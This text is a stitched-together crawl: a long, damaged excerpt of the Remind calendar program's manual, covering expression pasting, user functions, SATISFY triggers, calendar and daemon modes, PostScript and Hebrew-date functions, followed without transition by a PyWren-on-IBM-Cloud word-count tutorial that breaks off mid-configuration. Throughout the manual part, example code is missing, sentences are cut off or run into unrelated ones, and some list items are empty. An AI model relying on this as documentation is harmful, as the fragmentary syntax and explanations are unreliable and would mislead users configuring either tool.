Returns a STRING with all lower-case characters in string converted to upper-case.
- value(s_varname [,x_default])
Returns the value of the specified variable. For example, value("X"+"Y") returns the value of variable XY, if it is defined. If XY is not defined, an error results.
However, if you supply a second argument, it is returned if the varname is not defined. The expression value("XY", 0) will return 0 if XY is not defined, and the value of XY if it is defined.
- version()
Returns a string specifying the version of Remind. For version 03.00.04, returns "03.00.04". It is guaranteed that as new versions of Remind are released, the value returned by version() will strictly increase, according to the rules for string ordering.
- weekno([dq_date, [i_wkstart, [i_daystart]]])
Returns the week number of the year. If no arguments are supplied, returns the ISO 8601 week number for today(). If one argument date is supplied, then returns the ISO 8601 week number for that date. If two arguments are supplied, then wkstart must range from 0 to 6, and represents the first day of the week (with 0 being Sunday and 6 being Saturday.). If wkstart is not supplied, then it defaults to 1. If the third argument daystart is supplied, then it specifies when Week 1 starts. If daystart is less than or equal to 7, then Week 1 starts on the first wkstart on or after January daystart. Otherwise, Week 1 starts on the first wkstart on or after December daystart. If omitted, daystart defaults to 29 (following the ISO 8601 definition.)
- wkday(dqi_arg)
If arg is a DATE or DATETIME, returns a string representing the day of the week of the date. If arg is an INT from 0 to 6, returns the corresponding weekday ("Sunday" to "Saturday").
- wkdaynum(dq_date)
Returns a number from 0 to 6 representing the day-of-week of the specified date. (0 represents Sunday, and 6 represents Saturday.)
- year(dq_date)
Returns a INT that is the year component of date.
This evaluates the expression "mydate", where "mydate" is presumably some pre-computed variable, and then "pastes" the result into the command-line for the parser to process.
A formal description of this is: When Remind encounters a "pasted-in" expression, it evaluates the expression, and coerces the result to a STRING. It then substitutes the string for the pasted-in expression, and continues parsing. Note, however, that expressions are evaluated only once, not recursively. Thus, writing:
["[a+b]"]
causes Remind to read the token "[a+b]". It does not interpret this as a pasted-in expression. In fact, the only way to get a literal left-bracket into a reminder is to use ["["].
You can use expression pasting almost anywhere. However, there are a few exceptions:
- If Remind is expecting an expression, as in the SET command, or the IF command, you should not include square brackets. For example, use:
SET a 4+5
and not:
SET a [4+5]
- You cannot use expression pasting for the first token on a line. For example, the following will not work:
["SET"] a 1
This restriction is because Remind must be able to unambiguously determine the first token of a line for the flow-control commands (to be discussed later.)
In fact, if Remind cannot determine the first token on a line, it assumes that it is a REM command. If expression-pasting is used, Remind assumes it is a REM command. Thus, the following three commands are equivalent:
REM 12 Nov 1993 AT 13:05 MSG BOO! 12 Nov 1993 AT 13:05 MSG BOO! [12] ["Nov " + 1993] AT [12:05+60] MSG BOO!
- You cannot use expression-pasting to determine the type (MSG, CAL, etc.) of a REM command. You can paste expressions before and after the MSG, etc keywords, but cannot do something like this:
REM ["12 Nov 1993 AT 13:05 " + "MSG" + " BOO!"]
COMMON PITFALLS IN Expression Pasting
Remember, when pasting in expressions, that extra spaces are not inserted. Thus, something like:
REM[expr]MSG[expr]
will probably fail.
If you use an expression to calculate a delta or back, ensure that the result is a positive number. Something like:
REM +[mydelta] Nov 12 1993 MSG foo
will fail if mydelta happens to be negative.
Flow Control Commands
Remind has commands that control the flow of a reminder script. Normally, reminder scripts are processed sequentially. However, IF and related commands allow you to process files conditionally, and skip sections that you don't want interpreted.
THE IF COMMAND
The IF command has the following form:
IF expr t-command t-command... ELSE f-command f-command... ENDIF
Note that the commands are shown indented for clarity. Also, the ELSE portion can be omitted. IF commands can be nested up to a small limit, probably around 8 or 16 levels of nesting, depending on your system.
If the expr evaluates to a non-zero INT, or a non-null STRING, then the IF portion is considered true, and the t-commands are executed. If expr evaluates to zero or null, then the f-commands (if the ELSE portion is present) are executed. If expr is not of type INT or STRING, then it is an error.
Examples:
In addition to the built-in functions, Remind allows you to define your own functions. The FSET command does this for you:
FSET fname(args) expr
Fname is the name of the function, and follows the convention for naming variables. Args is a comma-separated list of arguments, and expr is an expression. Args can be empty, in which case you define a function taking no parameters. Here are some examples::
- If you access a variable in expr that is not in the list of arguments, the "global" value (if any) is used.
- Function and parameter names are significant only to 12 characters..
- User-defined functions may call other functions, including other user-defined functions. However, recursive calls are not allowed.
- User-defined functions are not syntax-checked when they are defined; parsing occurs only when they are called.
-
The WARN keyword allows precise control over advance warning in a more flexible manner than the delta mechanism. It should be followed by the name of a user-defined function, warn_function.
If a warn_function is supplied, then it must take one argument of type INT. Remind ignores any delta, and instead calls warn_function successively with the arguments 1, 2, 3, ...
Warn_function's return value n is interpreted as follows:
- If n is positive, then the reminder is triggered exactly n days before its trigger date.
-.
Similarly to WARN, the SCHED keyword allows precise control over the scheduling of timed reminders. It should be followed by the name of a user-defined function, sched_function.
If a scheduling function is supplied, then it must take one argument of type INT. Rather than using the AT time, time delta, and time repeat, Remind calls the scheduling function to determine when to trigger the reminder. The first time the reminder is queued, the scheduling function is called with an argument of 1. Each time the reminder is triggered, it is re-scheduled by calling the scheduling function again. On each call, the argument is incremented by one.
The return value of the scheduling function must be an INT or a TIME. If the return value is a TIME, then the reminder is re-queued to trigger at that time. If it is a positive integer n, then the reminder is re-queued to trigger at the previous trigger time plus n minutes. Finally, if it is a negative integer or zero, then the reminder is re-queued to trigger n minutes before the AT time. Note that there must be an AT clause for the SCHED clause to do anything.
Here's an example:
FSET _sfun(x) choose(x,
The form of REM that uses SATISFY is as follows:
REM trigger SATISFY expr
The way this works is as follows: Remind first calculates a trigger date, in the normal fashion. Next, it sets trigdate() to the calculated trigger date. It then evaluates expr. If the result is not the null string or zero, processing ends. Otherwise, Remind computes the next trigger date, and re-tests expr. This iteration continues until expr evaluates to non-zero or non-null, or until the iteration limit specified with the
Let's see how this works. The SATISFY clause iterates through all the 13ths of successive months, until a trigger date is found whose day-of-week is Friday (== 5). If a valid date was found, we use the calculated trigger date to set up the next reminder.
We could also have written:
REM Fri SATISFY day(trigdate()) == 13
but this would result in more iterations, since "Fridays" occur more often than "13ths of the month."
This technique of using one REM command to calculate a trigger date to be used by another command is quite powerful. For example, suppose you wanted to OMIT Labour day, which is the first Monday in September. You could use:
#
the result will not be as you expect. Consider producing a calendar for September, 1992. Labour Day was on Monday, 7 September, 1992. However, when Remind gets around to calculating the trigger for Tuesday, 8 September, 1992, the OMIT command will now be omitting Labour Day for 1993, and the "Mon AFTER" command will not be triggered. (But see the description of SCANFROM in the section "Details about Trigger Computation.")
It is probably best to stay away from computing OMIT trigger dates unless you keep these pitfalls in mind.
For versions of Remind starting from 03.00.07, you can include a MSG, RUN, etc. clause in a SATISFY clause as follows:soff]
Flagson and flagsoff consist of strings of the characters "extvlf" that correspond to the debugging options discussed in the command-line options section. If preceded with a "+", the corresponding group of debugging options is switched on. Otherwise, they are switched off. For example, you could use this sequence to debug a complicated expression:
DEBUG +x set a very_complex_expression(many_args) DEBUG -x
THE DUMPVARS COMMAND
The command DUMPVARS displays the values of variables in memory. Its format is:
DUMPVARS [var...]
If you supply a space-separated list of variable names, the corresponding variables are displayed. If you do not supply a list of variables, then all variables in memory are displayed. To dump a system variable, put its name in the list of variables to dump. If you put a lone dollar sign in the list of variables to dump, then all system variables will be dumped.
THE ERRMSG COMMAND
The ERRMSG command has the following format:
ERRMSG body
The body is passed through the substitution filter (with an implicit trigger date of today()) and printed to the error output stream. Example:
IF !defined("critical_var") ERRMSG You must supply a value for "critical_var" EXIT ENDIF
THE EXIT COMMAND
The above example also shows the use of the EXIT command. This causes an unconditional exit from script processing. Any queued timed reminders are discarded. If you are in calendar mode (described next), then the calendar processing is aborted.
If you supply an INT-type expression after the EXIT command, it is returned to the calling program as the exit status. Otherwise, an exit status of 99 is returned.
THE FLUSH COMMAND
This command simply consists of the word FLUSH on a line by itself. The command flushes the standard output and standard error streams used by Remind. This is not terribly useful to most people, but may be useful if you run Remind as a subprocess of another program, and want to use pipes for communication.
Calendar Mode
If you supply the -c, -s or -p command-line option, then Remind runs in "calendar mode." In this mode, Remind interprets the script repeatedly, performing one iteration through the whole file for each day in the calendar. Reminders that trigger are saved in internal buffers, and then inserted into the calendar in the appropriate places.
If you also supply
then Remind executes the script 31 times, once for each day in January. Each time it executes the script, it increments the value of today(). Any reminders whose trigger date matches today() are entered into the calendar.
MSG and CAL-type reminders, by default, have their entire body inserted into the calendar. RUN-type reminders are not normally inserted into the calendar. However, if you enclose a portion of the body in the %"...%" sequence, only that portion is inserted. For example, consider the following:
REM 6 Jan MSG %"Dianne's birthday%" is %b
In the normal mode, Remind would print "Dianne's birthday is today" on 6 January. However, in the calendar mode, only the text "Dianne's birthday" is inserted into the box for 6 January.
If you explicitly use the %"...%" sequence in a RUN-type reminder, then the text between the delimiters is inserted into the calendar. If you use the sequence %"%" in a MSG or CAL-type reminder, then no calendar entry is produced for that reminder.
PRESERVING VARIABLES
Because Remind iterates through the script for each day in the calendar, slow operations may severely reduce the speed of producing a calendar.
For example, suppose you set the variables "me" and "hostname" as follows:
SET me shell("whoami") SET hostname shell("hostname")
Normally, Remind clears all variables between iterations in calendar mode. However, if certain variables are slow to compute, and will not change between iterations, you can "preserve" their values with the PRESERVE command. Also, since function definitions are preserved between calendar iterations, there is no need to redefine them on each iteration. Thus, you could use the following sequence:
IF ! defined("initialized") set initialized 1 set me shell("whoami") set hostname shell("hostname") fset func(x) complex_expr preserve initialized me hostname ENDIF
The operation is as follows: On the first iteration through the script, "initialized" is not defined. Thus, the commands between IF and ENDIF are executed. The PRESERVE command ensures that the values of initialized, me and hostname are preserved for subsequent iterations. On the next iteration, the commands are skipped, since initialized has remained defined. Thus, time-consuming operations that do not depend on the value of today() are done only once.
System variables (those whose names start with '$') are automatically preserved between calendar iterations.
Note that for efficiency, Remind caches the reminder script (and any INCLUDEd files) in memory when producing a calendar.
Timed reminders are sorted and placed into the calendar in time order. These are followed by non-timed reminders. Remind automatically places the time of timed reminders in the calendar according to the
The PS and PSFILE reminders pass PostScript code directly to the printer. They differ in that the PS-type reminder passes its body directly to the PostScript output (after processing by the substitution filter) while the PSFILE-type's body should simply consist of a filename. The Rem2PS program will open the file named in the PSFILE-type reminder, and include its contents in the PostScript output.
The PostScript-type reminders for a particular day are included in the PostScript output in sorted order of priority. Note that the order of PostScript commands has a major impact on the appearance of the calendars. For example, PostScript code to shade a calendar box will obliterate code to draw a moon symbol if the moon symbol code is placed in the calendar first. For this reason, you should not provide PS or PSFILE-type reminders with priorities; instead, you should ensure that they appear in the reminder script in the correct order. PostScript code should draw objects working from the background to the foreground, so that foreground objects properly overlay background ones. If you prioritize these reminders and run the script using descending sort order for priorities, the PostScript output will not work.
All of the PostScript code for a particular date is enclosed in a save-restore pair. However, if several PostScript-type reminders are triggered for a single day, each section of PostScript is not enclosed in a save-restore pair - instead, the entire body of included PostScript is enclosed.
PostScript-type reminders are executed by the PostScript printer before any regular calendar entries. Thus, regular calendar entries will overlay the PostScript-type reminders, allowing you to create shaded or graphical backgrounds for particular days.
Before executing your PostScript code, the origin of the PostScript coordinate system is positioned to the bottom left-hand corner of the "box" in the calendar representing today(). This location is exactly in the middle of the intersection of the bottom and left black lines delineating the box - you may have to account for the thickness of these lines when calculating positions.
Several PostScript variables are available to the PostScript code you supply. All distance and size variables are in PostScript units (1/72 inch.) The variables are:
- LineWidth
The width of the black grid lines making up the calendar.
- Border
The border between the center of the grid lines and the space used to print calendar entries. This border is normally blank space.
- BoxWidth and BoxHeight
The width and height of the calendar box, from center-to-center of the black gridlines.
- InBoxHeight
The height from the center of the bottom black gridline to the top of the regular calendar entry area. The space from here to the top of the box is used only to draw the day number.
- /DayFont, /EntryFont, /SmallFont, /TitleFont and /HeadFont
The fonts used to draw the day numbers, the calendar entries, the small calendars, the calendar title (month, year) and the day-of-the-week headings, respectively.
- DaySize, EntrySize, TitleSize and HeadSize
The sizes of the above fonts. (The size of the small calendar font is not defined here.) For example, if you wanted to print the Hebrew date next to the regular day number in the calendar, use:
REM PS Border BoxHeight Border sub DaySize sub moveto \ /DayFont findfont DaySize scalefont setfont \ ([hebday(today())] [hebmon(today())]) show
Note how /DayFont and DaySize are used.
Note that if you supply PostScript code, it is possible to produce invalid PostScript files. Always test your PostScript thoroughly with a PostScript viewer before sending it to the printer. You should not use any document structuring comments in your PostScript code.
Daemon Mode
If you use the -z command-line option, Remind runs in the "daemon" mode. In this mode, no "normal" reminders are issued. Instead, only timed reminders are collected and queued, and are then issued whenever they reach their trigger time.
In addition, Remind wakes up every few minutes to check the modification date on the reminder script (the filename supplied on the command line.) If Remind detects that the script has changed, it re-executes itself in daemon mode, and interprets the changed script.
In daemon mode, Remind also re-reads the remind script when it detects that the system date has changed.
In daemon mode, Remind acts as if the command-line option, Remind runs in purge mode. In this mode, it tries to purge expired reminders from your reminder files.
In purge mode, Remind reads your reminder file and creates a new file by appending ".purged" to the original file name. Note that Remind never edits your original file; it always creates a new .purged file.
If you invoke Remind against a directory instead of a file, then a .purged file is created for each *.rem file in the directory.
Normally, Remind does not create .purged files for INCLUDed files. However, if you supply a numeric argument after -j, then Remind will create .purged files for the specified level of INCLUDE. For example, if you invoke Remind with the argument -j2, then .purged files will be created for the file (or directory) specified on the command line, any files included by them, and any files included by those files. However, .purged files will not be created for third-or-higher level INCLUDE files.
Determining which reminders have expired is extremely tricky. Remind does its best, but you should always compare the .purged file to the original file and hand-merge the changes back in.
Remind annotates the .purged file as follows:
An expired reminder is prefixed with: #!P: Expired:
In situations where Remind cannot reliably determine that something was expired, you may see the following comments inserted before the problematic line:
#!P: Cannot purge SATISFY-type reminders #!P: The next IF evaluated false... #!P: REM statements in IF block not checked for purging. #!P: The previous IF evaluated true. #!P: REM statements in ELSE block not checked for purging #!P: The next IFTRIG did not trigger. #!P: REM statements in IFTRIG block not checked for purging. #!P: Next line has expired, but contains expression... please verify #!P: Next line may have expired, but contains non-constant expression #!P! Could not parse next line: Some-Error-Message-Here
Remind always annotates .purged files with lines beginning with "#!P". If such lines are encountered in the original file, they are not copied to the .purged file.
Sorting Reminders
The -g option causes Remind to sort reminders by trigger date, time and priority before issuing them. Note that reminders are still calculated in the order encountered in the script. However, rather than being issued immediately, they are saved in an internal buffer. When Remind has finished processing the script, it issues the saved reminders in sorted order. The -g option can be followed by up to four characters that must all be "a" or "d". The first character specifies the sort order by trigger date (ascending or descending), the second specifies the sort order by trigger time and the third specifies the sort order by priority. If the fourth character is "d", the untimed reminders are sorted before timed reminders. The default is to sort all fields in ascending order and to sort untimed reminders after timed reminders.
In ascending order, reminders are issued with the most imminent first. Descending order is the reverse. Reminders are always sorted by trigger date, and reminders with the same trigger date are then sorted by trigger time. If two reminders have the same date and time, then the priority is used to break ties. Reminders with the same date, time and priority are issued in the order they were encountered.
You can define a user-defined function called SORTBANNER that takes one DATE-type argument. In sort mode, the following sequence happens:
If Remind notices that the next reminder to issue has a different trigger date from the previous one (or if it is the first one to be issued), then SORTBANNER is called with the trigger date as its argument. The result is coerced to a string, and passed through the substitution filter with the appropriate trigger date. The result is then displayed.
Here's an example - consider the following fragment:
#
You can use the args() built-in function to determine whether or not SORTBANNER has been defined. (This could be used, for example, to provide a default definition for SORTBANNER in a system-wide file included at the end of the user's file.) Here's an example:
#:
- If msgprefix() is defined, it is evaluated with the priority of the reminder as its argument. The result is printed. It is not passed through the substitution filter.
- The body of the reminder is printed.
- options), an analogous pair of functions named calprefix() and calsuffix() can be defined. They work with all reminders that produce an entry in the calendar (i.e., CAL- and possibly RUN-type reminders as well as MSG-type reminders.)
NOTES
Normally, the body of a reminder is followed by a carriage return. Thus, the results of msgsuffix() will appear on the next line. If you don't want this, end the body of the reminder with a percentage sign, "%". If you want a space between your reminders, simply include a carriage return (char(13)) as part of the msgsuffix() return value.
If Remind has problems evaluating msgprefix(), msgsuffix() or sortbanner(), you will see a lot of error messages. For an example of this, define the following:
fset msgprefix(x) x/0
Foreign Language Support
Your version of Remind may have been compiled to support a language other than English. This support may or may not be complete - for example, all error and usage messages may still be in English. However, at a minimum, foreign-language versions of Remind will output names of months and weekdays in the foreign language. Also, the substitution mechanism will substitute constructs suitable for the foreign language rather than for English.
A foreign-language version of Remind will accept either the English or foreign-language names of weekdays and months in a reminder script. However, for compatibility between versions of Remind, you should use only the English names in your scripts. Also, if your C compiler or run-time libraries are not "8-bit clean" or don't understand the ISO-Latin character set, month or day names with accented letters may not be recognized.
The Hebrew Calendar
Remind has support for the Hebrew calendar, which is a luni-solar calendar. This allows you to create reminders for Jewish holidays, jahrzeits (anniversaries of deaths) and smachot (joyous occasions.)
THE HEBREW YEAR
The Hebrew year has 12 months, alternately 30 and 29 days long. The months are: Tishrey, Heshvan, Kislev, Tevet, Shvat, Adar, Nisan, Iyar, Sivan, Tamuz, Av and Elul. In Biblical times, the year started in Nisan, but Rosh Hashana (Jewish New Year) is now celebrated on the 1st and 2nd of Tishrey.
In a cycle of 19 years, there are 7 leap years, being years 3, 6, 8, 11, 14, 17 and 19 of the cycle. In a leap year, an extra month of 30 days is added before Adar. The two Adars are called Adar A and Adar B.
For certain religious reasons, the year cannot start on a Sunday, Wednesday or Friday. To adjust for this, a day is taken off Kislev or added to Heshvan. Thus, a regular year can have from 353 to 355 days, and a leap year from 383 to 385.
When Kislev or Heshvan is short, it is called chaser, or lacking. When it is long, it is called shalem, or full.
The Jewish date changes at sunset. However, Remind will change the date at midnight, not sunset. So in the period between sunset and midnight, Remind will be a day earlier than the true Jewish date. This should not be much of a problem in practice.
The computations for the Jewish calendar were based on the program "hdate" written by Amos Shapir of the Hebrew University of Jerusalem, Israel. He also supplied the preceding explanation of the calendar.
HEBREW DATE FUNCTIONS
- hebday(d_date)
Returns the day of the Hebrew month corresponding to the date parameter. For example, 12 April 1993 corresponds to 21 Nisan 5753. Thus, hebday('1993/04/12') returns 21.
- hebmon(d_date)
Returns the name of the Hebrew month corresponding to date. For example, hebmon('1993/04/12') returns "Nisan".
- hebyear(d_date)
Returns the Hebrew year corresponding to date. For example, hebyear('1993/04/12') returns 5753.
- hebdate(i_day, s_hebmon [,id_yrstart [,i_jahr [,i_aflag]]])
The hebdate() function is the most complex of the Hebrew support functions. It can take from 2 to 5 arguments. It returns a DATE corresponding to the Hebrew date.
The day parameter can range from 1 to 30, and specifies the day of the Hebrew month. The hebmon parameter is a string that must name one of the Hebrew months specified above. Note that the month must be spelled out in full, and use the English transliteration shown previously. You can also specify "Adar A" and "Adar B." Month names are not case-sensitive.
The yrstart parameter can either be a DATE or an INT. If it is a DATE, then the hebdate() scans for the first Hebrew date on or after that date. For example:)
returns 1995/12/15, because that date corresponds to 22 Kislev, 5756. Note that none of the Hebrew date functions will work with dates outside Remind's normal range for dates.
If yrstart is not supplied, it defaults to today().
The jahr modifies the behaviour of hebdate() as follows:
If jahr is 0 (the default), then hebdate() keeps scanning until it finds a date that exactly satisfies the other parameters. For example:
hebdate(30, "Adar A", 1993/01/01)
returns 1995/03/02, corresponding to 30 Adar A, 5755, because that is the next occurrence of 30 Adar A after 1 January, 1993. This behaviour is appropriate for Purim Katan, which only appears in leap years.
If jahr is 1, then the date is modified as follows:
- 30 Heshvan is converted to 1 Kislev in years when Heshvan is chaser
- 30 Kislev is converted to 1 Tevet in years when Kislev is chaser
- 30 Adar A is converted to 1 Nisan in non-leapyears
-:
- 30 Kislev and 30 Heshvan are converted to 29 Kislev and 29 Heshvan, respectively, if the month is chaser
- 30 Adar A is converted to 30 Shvat in non-leapyears
- Other dates in Adar A are moved to the corresponding day in Adar in non-leapyears
if jahr is not 0, 1, or 2, it is interpreted as a Hebrew year, and the behaviour is calculated as described in the next section, "JAHRZEITS."
The aflag parameter modifies the behaviour of the function for dates in Adar during leap years. The aflag is only used if yrstart is a DATE type.
The aflag only affects date calculations if hebmon is specified as "Adar". In leap years, the following algorithm is followed:
- If aflag is 0, then the date is triggered in Adar B. This is the default.
- If aflag is 1, then the date is triggered in Adar A. This may be appropriate for jahrzeits in the Ashkenazi tradition; consult a rabbi.
- If aflag is 2, then the date is triggered in both Adar A and Adar B of a leap year. Some Ashkenazim perform jahrzeit in both Adar A and Adar B.
JAHRZEITS
A jahrzeit is a yearly commemoration of someone's death. It normally takes place on the anniversary of the death, but may be delayed if burial is delayed - consult a rabbi for more information.
In addition, because some months change length, it is not obvious which day the anniversary of a death is. The following rules are used:
-.
- If the death occurred on 1-29 Adar A, it is observed on 1-29 Adar in non-leapyears.
- If the death occurred on 30 Adar A, it is observed on 30 Shvat in a non-leapyear.
Specifying a Hebrew year for the jahr parameter causes the correct behaviour to be selected for a death in that year. You may also have to specify aflag, depending on your tradition.
The jahrzeit information was supplied by Frank Yellin, who quoted "The Comprehensive Hebrew Calendar" by Arthur Spier, and "Calendrical Calculations" by E. M. Reingold and Nachum Dershowitz.
The SHADE keyword is followed by either one or three numbers, from 0 to 255. If one number is supplied, it is interpreted as a grey-scale value from black (0) to white (255). If three numbers are supplied, they are interpreted as RGB components from minimum (0) to maximum (255). The example above shades weekends a fairly dark grey and makes Mondays a fully-saturated red. (These shadings appear in calendars produced by Rem2PS, tkremind and rem2html.)
The MOON special replaces the psmoon() function. Use it like this:, the backend chooses an appropriate size.
fontsize is the font size in PostScript units of the msg
Msg is additional text that is placed near the moon glyph.
Note that only the Rem2PS backend supports moonsize and fontsize; the other backends use fixed sizes.
The COLOR special lets you place colored reminders in the calendar. Use it like this:
REM ... SPECIAL COLOR 255 0 0 This is a bright red reminder REM ... SPECIAL COLOR 0 128 0 This is a dark green reminder
You can spell COLOR either the American way ("COLOR") or the British way ("COLOUR"). This manual will use the American way.
Immediately following COLOR should be three decimal numbers ranging from 0 to 255 specifying red, green and blue intensities, respectively. The rest of the line is the text to put in the calendar.
The COLOR special is "doubly special", because in its normal operating mode, remind treats a COLOR special just like a MSG-type reminder. Also, if you invoke Remind with -cc..., then it approximates SPECIAL COLOR reminders on your terminal.
The WEEK special lets you place annotations such as the week number in the calendar. For example, this would number each Monday with the ISO 8601 week number. The week number is shown like this: "(Wn)" in this example, but you can put whatever text you like after the WEEK keyword.
REM Monday SPECIAL WEEK (W[weekno()])
Miscellaneous
COMMAND ABBREVIATIONS
The following tokens can be abbreviated:
- REM can be omitted - it is implied if no other valid command is present.
- CLEAR-OMIT-CONTEXT --> CLEAR
- PUSH-OMIT-CONTEXT --> PUSH
- POP-OMIT-CONTEXT --> POP
- DUMPVARS --> DUMP
- BANNER --> BAN
- INCLUDE --> INC
-()]) &
This reminder will run at one minute to midnight. It will cause a new Remind process to start at one minute past midnight. This allows you to have a continuous reminder service so you can work through the night and still get timed reminders for early in the morning. Note that this trick is no longer necessary, providing you run Remind in daemon mode.
This example warns you 5 days ahead of each American presidential election. The first REM command calculates the first Tuesday after the first Monday in November. (This is equivalent to the first Tuesday on or after 2 November.) The SATISFY clause ensures that the trigger date is issued only in election years, which are multiples of 4. The second REM command actually issues the reminder.
DETAILS ABOUT TRIGGER COMPUTATION
Here is a conceptual description of how triggers are calculated. Note that Remind actually uses a much more efficient procedure, but the results are the same as if the conceptual procedure had been followed.
Remind starts from the current date (that is, the value of today()) and scans forward, examining each day one at a time until it finds a date that satisfies the trigger, or can prove that no such dates (on or later than today()) exist.
If Remind is executing a SATISFY-type reminder, it evaluates the expression with trigdate() set to the date found above. If the expression evaluates to zero or the null string, Remind continues the scanning procedure described above, starting with the day after the trigger found above.
The SCANFROM clause (having a syntax similar to UNTIL) can modify the search strategy used. In this case, Remind begins the scanning procedure at scan_date, which is the date specified in the SCANFROM clause. For example:
REM Mon 1 SCANFROM 17 Jan 1992 MSG Foo
The example above will always have a trigger date of Monday, 3 February 1992. That is because Remind starts scanning from 17 January 1992, and stops scanning as soon as it hits a date that satisfies "Mon 1."
The main use of SCANFROM is in situations where you want to calculate the positions of floating holidays. Consider the Labour Day example shown much earlier. Labour Day is the first Monday in September. It can move over a range of 7 days. Consider the following sequence:.
In general, use SCANFROM as shown for safe movable OMITs. The amount you should scan back by (7 days in the example above) depends on the number of possible consecutive OMITted days that may occur, and on the range of the movable holiday. Generally, a value of 7 is safe.
The FROM clause operates almost like the counterpoint to UNTIL. It prevents the reminder from triggering before the FROM date. For example, the following reminder:')] \ UNTIL 2 Aug 2007 MSG Test
but that's a lot harder to read. Internally, Remind treats FROM exactly as illustrated using SCANFROM. For that reason, you cannot use both FROM and SCANFROM.
Note that if you use one REM command to calculate a trigger date, perform date calculations (addition or subtraction, for example) and then use the modified date in a subsequent REM command, the results may not be what you intended. This is because you have circumvented the normal scanning mechanism. You should try to write REM commands that compute trigger dates that can be used unmodified in subsequent REM commands. The file "defs.rem" that comes with the Remind distribution contains examples.
DETAILS ABOUT TRIGVALID()
The trigvalid() function returns 1 if Remind could find a trigger date for the previous REM or IFTRIG command. More specifically, it returns 1 if Remind finds a date not before the starting date of the scanning that satisfies the trigger. In addition, there is one special case in which trigvalid() returns 1 and trigdate() returns a meaningful result:
If the REM or IFTRIG command did not contain an UNTIL clause, and contained all of the day, month and year components, then Remind will correctly compute a trigger date, even if it happens to be before the start of scanning. Note that this behaviour is not true for versions of Remind prior to 03.00.01.
Author
Remind is now supported by Roaring Penguin Software Inc. ()
Dianne Skoll <[email protected]> wrote Remind. The moon code was copied largely unmodified from "moontool" by John Walker. The sunrise and sunset functions use ideas from programs by Michael Schwartz and Marc T. Kaufman. The Hebrew calendar support was taken from "hdate" by Amos Shapir. OS/2 support was done by Darrel Hankerson, Russ Herman, and Norman Walsh. The supported foreign languages and their translators are listed below. Languages marked "complete" support error messages and usage instructions in that language; all others only support the substitution filter mechanism and month/day names.
German -- Wolfgang Thronicke
Dutch -- Willem Kasdorp and Erik-Jan Vens
Finnish -- Mikko Silvonen (complete)
French -- Laurent Duperval (complete)
Norwegian -- Trygve Randen
Danish -- Mogens Lynnerup
Polish -- Jerzy Sobczyk (complete)
Brazilian Portuguese -- Marco Paganini (complete)
Italian -- Valerio Aimale
Romanian -- Liviu Daia
Spanish -- Rafa Couto
Icelandic -- Björn Davíðsson
Bugs
There's no good reason why read-only system variables are not implemented as functions, or why functions like version(), etc. are not implemented as read-only system variables.
Hebrew dates in Remind change at midnight instead of sunset.
Language should be selectable at run-time, not compile-time. Don't expect this to happen soon!
Remind has some built-in limits (for example, number of global OMITs.)
Bibliography
Nachum Dershowitz and Edward M. Reingold, "Calendrical Calculations", Software-Practice and Experience, Vol. 20(9), Sept. 1990, pp 899-928.
L. E. Doggett, Almanac for computers for the year 1978, Nautical Almanac Office, USNO.
Richard Siegel and Michael and Sharon Strassfeld, The First Jewish Catalog, Jewish Publication Society of America.
See Also
rem, rem2ps, tkremind
Referenced By
cm2rem(1), pilot-reminders(1), wyrd(1), wyrdrc(5). | https://www.mankier.com/1/remind | CC-MAIN-2017-39 | refinedweb | 17,478 | 64 |
@ibm+build smart
+buildsmart
Learn more >
@redhat+build open
+buildopen
Tutorial
Belinda Vennam | Published March 8, 2019
CloudData storesObject StorageServerless
This tutorial gets you up and running with PyWren so that you can quickly and easily scale your parallel workloads. Your code is run in parallel, as individual functions on a serverless platform.
PyWren is an open source project that enables Python developers to massively scale the execution of Python code and then monitor and combine the results of those executions. One of PyWren’s goals is to simplify this push to cloud experience, bringing the compute power of serverless computing to everyone.
PyWren is great for various use cases: processing data in object storage, running embarrassingly parallel compute jobs like Monte Carlo simulations, or enriching data with more attributes.
In this tutorial, you use PyWren to count the occurrences of words in a set of text documents in an object store. You set up a Cloud Object Storage Instance and add the .txt documents. Next, you set up PyWren and run some python code to count the words. This use case is simple, but you can see the benefits from scaling out the count action across a set of functions that are running in parallel.
.txt
You can use these word counts to find patterns or entities across a large set of documents or to help expand the variation of vocabulary in a set of essays.
In this tutorial, you learn:
To complete this tutorial, you need the following tools:
First, you create text files and an instance of IBM Cloud Object Storage to hold those files. Then, you set up PyWren and create Python code for running a word count at scale.
Create two .txt files that contain text with words that need to be counted for this tutorial.
Create one file named sixteenwords.txt, and paste in the following text:
sixteenwords.txt
These are just some words there are sixteen.
These are just some words there are sixteen.
Create another file named eightwords.txt, and paste in the following text:
eightwords.txt
These are just some words there are eight.
Save these files.
Now you run some data analysis against objects that are stored in a Cloud Object Storage bucket. Start by creating the Cloud Object Storage service and bucket.
Go to the IBM Cloud Object Storage page in the IBM Cloud Catalog.
Choose a Service name and click Create.
Click Buckets on the left menu and type a bucket name such as words. Choose the resiliency and the location. For this example, use Regional resiliency in the us-south location.
words
Click Create Bucket.
After the bucket is created, add your two .txt files by clicking Upload in the upper right corner. You can also drag the files to the bucket.
Create another bucket that PyWren uses to store results in. On the left menu, click Buckets. Provide a bucket name, such as pywrenresults. Choose the same resiliency and location options as the words bucket, and click Create Bucket.
pywrenresults
Click Endpoints on the left menu and notice the public Regional us-south endpoint. It should be something like: s3.us-south.cloud-object-storage.appdomain.cloud.
Regional us-south
s3.us-south.cloud-object-storage.appdomain.cloud
Click Service Credentials on the left menu. If a service credential is not created, click Create. After you have a service credential, make note of the value for apikey.
apikey
Clone the pywren-ibm-cloud repository:
git clone [email protected]:pywren/pywren-ibm-cloud.git
Navigate to the pywren folder inside the pywren-ibm-cloud folder:
pywren
pywren-ibm-cloud
cd pywren-ibm-cloud/pywren
Obtain the most recent stable release version from the release tab:
git checkout 1.0.3
Build and install the project:
python3 setup.py install --force
Copy the pywren/ibmcf/default_config.yaml.template into a file named ~/.pywren_config:
pywren/ibmcf/default_config.yaml.template
~/.pywren_config
cp ibmcf/default_config.yaml.template ~/.pywren_config
Edit the ~/.pywren_config file with the information you saved earlier from Cloud Object Storage:
ibm_cos:
# make sure to use full path.
# for example
endpoint : <COS_API_ENDPOINT>
api_key : <COS_API_KEY>
Edit the ~/.pywren_config file with the bucket name for storing the results from PyWren:
pywren:
storage_bucket: <BUCKET_NAME>
You also need to give PyWren an endpoint, a namespace, and an API key from Cloud Functions. You can find that information at the API Key page.
ibm_cf:
# Obtain all values from
# endpoint is the value of 'host'
# make sure to use https:// as prefix
endpoint : <CLOUD_FUNCTIONS_API_ENDPOINT>
# namespace = value of CURRENT NAMESPACE
